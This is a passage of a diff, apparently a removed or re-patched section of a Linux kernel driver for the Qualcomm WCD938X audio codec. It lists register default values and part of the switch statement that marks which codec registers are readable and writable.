+-	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
+-	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
+-	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
+-	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
+-	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
+-	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
+-	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
+-	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
+-	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
+-	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_SPARE_0,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_1,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_2,                              0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
+-	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
+-	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
+-	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
+-};
+-
+-static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_PAGE_REGISTER:
+-	case WCD938X_ANA_BIAS:
+-	case WCD938X_ANA_RX_SUPPLIES:
+-	case WCD938X_ANA_HPH:
+-	case WCD938X_ANA_EAR:
+-	case WCD938X_ANA_EAR_COMPANDER_CTL:
+-	case WCD938X_ANA_TX_CH1:
+-	case WCD938X_ANA_TX_CH2:
+-	case WCD938X_ANA_TX_CH3:
+-	case WCD938X_ANA_TX_CH4:
+-	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MBHC_MECH:
+-	case WCD938X_ANA_MBHC_ELECT:
+-	case WCD938X_ANA_MBHC_ZDET:
+-	case WCD938X_ANA_MBHC_BTN0:
+-	case WCD938X_ANA_MBHC_BTN1:
+-	case WCD938X_ANA_MBHC_BTN2:
+-	case WCD938X_ANA_MBHC_BTN3:
+-	case WCD938X_ANA_MBHC_BTN4:
+-	case WCD938X_ANA_MBHC_BTN5:
+-	case WCD938X_ANA_MBHC_BTN6:
+-	case WCD938X_ANA_MBHC_BTN7:
+-	case WCD938X_ANA_MICB1:
+-	case WCD938X_ANA_MICB2:
+-	case WCD938X_ANA_MICB2_RAMP:
+-	case WCD938X_ANA_MICB3:
+-	case WCD938X_ANA_MICB4:
+-	case WCD938X_BIAS_CTL:
+-	case WCD938X_BIAS_VBG_FINE_ADJ:
+-	case WCD938X_LDOL_VDDCX_ADJUST:
+-	case WCD938X_LDOL_DISABLE_LDOL:
+-	case WCD938X_MBHC_CTL_CLK:
+-	case WCD938X_MBHC_CTL_ANA:
+-	case WCD938X_MBHC_CTL_SPARE_1:
+-	case WCD938X_MBHC_CTL_SPARE_2:
+-	case WCD938X_MBHC_CTL_BCS:
+-	case WCD938X_MBHC_TEST_CTL:
+-	case WCD938X_LDOH_MODE:
+-	case WCD938X_LDOH_BIAS:
+-	case WCD938X_LDOH_STB_LOADS:
+-	case WCD938X_LDOH_SLOWRAMP:
+-	case WCD938X_MICB1_TEST_CTL_1:
+-	case WCD938X_MICB1_TEST_CTL_2:
+-	case WCD938X_MICB1_TEST_CTL_3:
+-	case WCD938X_MICB2_TEST_CTL_1:
+-	case WCD938X_MICB2_TEST_CTL_2:
+-	case WCD938X_MICB2_TEST_CTL_3:
+-	case WCD938X_MICB3_TEST_CTL_1:
+-	case WCD938X_MICB3_TEST_CTL_2:
+-	case WCD938X_MICB3_TEST_CTL_3:
+-	case WCD938X_MICB4_TEST_CTL_1:
+-	case WCD938X_MICB4_TEST_CTL_2:
+-	case WCD938X_MICB4_TEST_CTL_3:
+-	case WCD938X_TX_COM_ADC_VCM:
+-	case WCD938X_TX_COM_BIAS_ATEST:
+-	case WCD938X_TX_COM_SPARE1:
+-	case WCD938X_TX_COM_SPARE2:
+-	case WCD938X_TX_COM_TXFE_DIV_CTL:
+-	case WCD938X_TX_COM_TXFE_DIV_START:
+-	case WCD938X_TX_COM_SPARE3:
+-	case WCD938X_TX_COM_SPARE4:
+-	case WCD938X_TX_1_2_TEST_EN:
+-	case WCD938X_TX_1_2_ADC_IB:
+-	case WCD938X_TX_1_2_ATEST_REFCTL:
+-	case WCD938X_TX_1_2_TEST_CTL:
+-	case WCD938X_TX_1_2_TEST_BLK_EN1:
+-	case WCD938X_TX_1_2_TXFE1_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_EN:
+-	case WCD938X_TX_3_4_ADC_IB:
+-	case WCD938X_TX_3_4_ATEST_REFCTL:
+-	case WCD938X_TX_3_4_TEST_CTL:
+-	case WCD938X_TX_3_4_TEST_BLK_EN3:
+-	case WCD938X_TX_3_4_TXFE3_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_BLK_EN2:
+-	case WCD938X_TX_3_4_TXFE2_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE1:
+-	case WCD938X_TX_3_4_TEST_BLK_EN4:
+-	case WCD938X_TX_3_4_TXFE4_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE2:
+-	case WCD938X_CLASSH_MODE_1:
+-	case WCD938X_CLASSH_MODE_2:
+-	case WCD938X_CLASSH_MODE_3:
+-	case WCD938X_CLASSH_CTRL_VCL_1:
+-	case WCD938X_CLASSH_CTRL_VCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_1:
+-	case WCD938X_CLASSH_CTRL_CCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_3:
+-	case WCD938X_CLASSH_CTRL_CCL_4:
+-	case WCD938X_CLASSH_CTRL_CCL_5:
+-	case WCD938X_CLASSH_BUCK_TMUX_A_D:
+-	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
+-	case WCD938X_CLASSH_SPARE:
+-	case WCD938X_FLYBACK_EN:
+-	case WCD938X_FLYBACK_VNEG_CTRL_1:
+-	case WCD938X_FLYBACK_VNEG_CTRL_2:
+-	case WCD938X_FLYBACK_VNEG_CTRL_3:
+-	case WCD938X_FLYBACK_VNEG_CTRL_4:
+-	case WCD938X_FLYBACK_VNEG_CTRL_5:
+-	case WCD938X_FLYBACK_VNEG_CTRL_6:
+-	case WCD938X_FLYBACK_VNEG_CTRL_7:
+-	case WCD938X_FLYBACK_VNEG_CTRL_8:
+-	case WCD938X_FLYBACK_VNEG_CTRL_9:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
+-	case WCD938X_FLYBACK_CTRL_1:
+-	case WCD938X_FLYBACK_TEST_CTL:
+-	case WCD938X_RX_AUX_SW_CTL:
+-	case WCD938X_RX_PA_AUX_IN_CONN:
+-	case WCD938X_RX_TIMER_DIV:
+-	case WCD938X_RX_OCP_CTL:
+-	case WCD938X_RX_OCP_COUNT:
+-	case WCD938X_RX_BIAS_EAR_DAC:
+-	case WCD938X_RX_BIAS_EAR_AMP:
+-	case WCD938X_RX_BIAS_HPH_LDO:
+-	case WCD938X_RX_BIAS_HPH_PA:
+-	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
+-	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
+-	case WCD938X_RX_BIAS_HPH_CNP1:
+-	case WCD938X_RX_BIAS_HPH_LOWPOWER:
+-	case WCD938X_RX_BIAS_AUX_DAC:
+-	case WCD938X_RX_BIAS_AUX_AMP:
+-	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
+-	case WCD938X_RX_BIAS_MISC:
+-	case WCD938X_RX_BIAS_BUCK_RST:
+-	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_BUFF:
+-	case WCD938X_RX_BIAS_FLYB_MID_RST:
+-	case WCD938X_HPH_CNP_EN:
+-	case WCD938X_HPH_CNP_WG_CTL:
+-	case WCD938X_HPH_CNP_WG_TIME:
+-	case WCD938X_HPH_OCP_CTL:
+-	case WCD938X_HPH_AUTO_CHOP:
+-	case WCD938X_HPH_CHOP_CTL:
+-	case WCD938X_HPH_PA_CTL1:
+-	case WCD938X_HPH_PA_CTL2:
+-	case WCD938X_HPH_L_EN:
+-	case WCD938X_HPH_L_TEST:
+-	case WCD938X_HPH_L_ATEST:
+-	case WCD938X_HPH_R_EN:
+-	case WCD938X_HPH_R_TEST:
+-	case WCD938X_HPH_R_ATEST:
+-	case WCD938X_HPH_RDAC_CLK_CTL1:
+-	case WCD938X_HPH_RDAC_CLK_CTL2:
+-	case WCD938X_HPH_RDAC_LDO_CTL:
+-	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
+-	case WCD938X_HPH_REFBUFF_UHQA_CTL:
+-	case WCD938X_HPH_REFBUFF_LP_CTL:
+-	case WCD938X_HPH_L_DAC_CTL:
+-	case WCD938X_HPH_R_DAC_CTL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
+-	case WCD938X_EAR_EAR_EN_REG:
+-	case WCD938X_EAR_EAR_PA_CON:
+-	case WCD938X_EAR_EAR_SP_CON:
+-	case WCD938X_EAR_EAR_DAC_CON:
+-	case WCD938X_EAR_EAR_CNP_FSM_CON:
+-	case WCD938X_EAR_TEST_CTL:
+-	case WCD938X_ANA_NEW_PAGE_REGISTER:
+-	case WCD938X_HPH_NEW_ANA_HPH2:
+-	case WCD938X_HPH_NEW_ANA_HPH3:
+-	case WCD938X_SLEEP_CTL:
+-	case WCD938X_SLEEP_WATCHDOG_CTL:
+-	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
+-	case WCD938X_MBHC_NEW_CTL_1:
+-	case WCD938X_MBHC_NEW_CTL_2:
+-	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
+-	case WCD938X_TX_NEW_AMIC_MUX_CFG:
+-	case WCD938X_AUX_AUXPA:
+-	case WCD938X_LDORXTX_MODE:
+-	case WCD938X_LDORXTX_CONFIG:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
+-	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
+-	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
+-	case WCD938X_HPH_NEW_INT_PA_MISC1:
+-	case WCD938X_HPH_NEW_INT_PA_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
+-	case WCD938X_MBHC_NEW_INT_SPARE_2:
+-	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
+-	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
+-	case WCD938X_AUX_INT_EN_REG:
+-	case WCD938X_AUX_INT_PA_CTRL:
+-	case WCD938X_AUX_INT_SP_CTRL:
+-	case WCD938X_AUX_INT_DAC_CTRL:
+-	case WCD938X_AUX_INT_CLK_CTRL:
+-	case WCD938X_AUX_INT_TEST_CTRL:
+-	case WCD938X_AUX_INT_MISC:
+-	case WCD938X_LDORXTX_INT_BIAS:
+-	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
+-	case WCD938X_LDORXTX_INT_TEST0:
+-	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
+-	case WCD938X_LDORXTX_INT_TEST1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
+-	case WCD938X_DIGITAL_PAGE_REGISTER:
+-	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
+-	case WCD938X_DIGITAL_CDC_RST_CTL:
+-	case WCD938X_DIGITAL_TOP_CLK_CFG:
+-	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
+-	case WCD938X_DIGITAL_SWR_RST_EN:
+-	case WCD938X_DIGITAL_CDC_PATH_MODE:
+-	case WCD938X_DIGITAL_CDC_RX_RST:
+-	case WCD938X_DIGITAL_CDC_RX0_CTL:
+-	case WCD938X_DIGITAL_CDC_RX1_CTL:
+-	case WCD938X_DIGITAL_CDC_RX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
+-	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
+-	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
+-	case WCD938X_DIGITAL_CDC_SWR_CLH:
+-	case WCD938X_DIGITAL_SWR_CLH_BYP:
+-	case WCD938X_DIGITAL_CDC_TX0_CTL:
+-	case WCD938X_DIGITAL_CDC_TX1_CTL:
+-	case WCD938X_DIGITAL_CDC_TX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_RST:
+-	case WCD938X_DIGITAL_CDC_REQ_CTL:
+-	case WCD938X_DIGITAL_CDC_RST:
+-	case WCD938X_DIGITAL_CDC_AMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
+-	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
+-	case WCD938X_DIGITAL_EFUSE_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
+-	case WCD938X_DIGITAL_PDM_WD_CTL0:
+-	case WCD938X_DIGITAL_PDM_WD_CTL1:
+-	case WCD938X_DIGITAL_PDM_WD_CTL2:
+-	case WCD938X_DIGITAL_INTR_MODE:
+-	case WCD938X_DIGITAL_INTR_MASK_0:
+-	case WCD938X_DIGITAL_INTR_MASK_1:
+-	case WCD938X_DIGITAL_INTR_MASK_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_INTR_LEVEL_0:
+-	case WCD938X_DIGITAL_INTR_LEVEL_1:
+-	case WCD938X_DIGITAL_INTR_LEVEL_2:
+-	case WCD938X_DIGITAL_INTR_SET_0:
+-	case WCD938X_DIGITAL_INTR_SET_1:
+-	case WCD938X_DIGITAL_INTR_SET_2:
+-	case WCD938X_DIGITAL_INTR_TEST_0:
+-	case WCD938X_DIGITAL_INTR_TEST_1:
+-	case WCD938X_DIGITAL_INTR_TEST_2:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
+-	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
+-	case WCD938X_DIGITAL_LOOP_BACK_MODE:
+-	case WCD938X_DIGITAL_SWR_DAC_TEST:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
+-	case WCD938X_DIGITAL_I2C_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_0:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
